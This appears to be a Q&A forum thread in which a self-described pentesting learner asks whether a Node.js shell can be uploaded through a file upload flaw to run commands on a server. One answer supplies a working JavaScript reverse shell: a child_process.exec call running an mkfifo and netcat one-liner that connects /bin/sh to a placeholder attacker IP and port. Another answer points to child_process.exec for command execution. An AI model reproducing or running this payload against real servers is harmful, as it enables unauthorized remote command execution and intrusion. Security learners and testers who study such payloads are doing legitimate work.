i'm trying to learn NodeJS pentesting process i have a found a remote file upload vulnerability in a Nodejs website ,can i upload a remote shell in NodeJS , like we do in PHP or ASPX and execute command ? can i upload a NodeJS shell.js and execute unix command in the server from this shell ?
Asked
Active
Viewed 4,919 times
2
-
You can upload shell.js script but you can not execute it remotely unless you have the SSH password and username of target – milad May 12 '20 at 10:10
2 Answers
2
Not sure if this is what you're looking for, but if you have the ability to upload a NodeJS script to a server and execute it, then yes, you can run shell commands using child_process.exec (see here for a similar question/answer).
Dykotomee
- 728
- 6
- 20
0
It's possible only if you can "EXECUTE" the file.
But if you can "execute" JavaScript code you could create a reverse shell using this:
(function () {
require("child_process")
.exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attackerIP> <attackerPort> >/tmp/f')
})()]
Otherwise if you can't execute the file then you only will see the content of the file:
daronwolff
- 1,994
- 21
- 18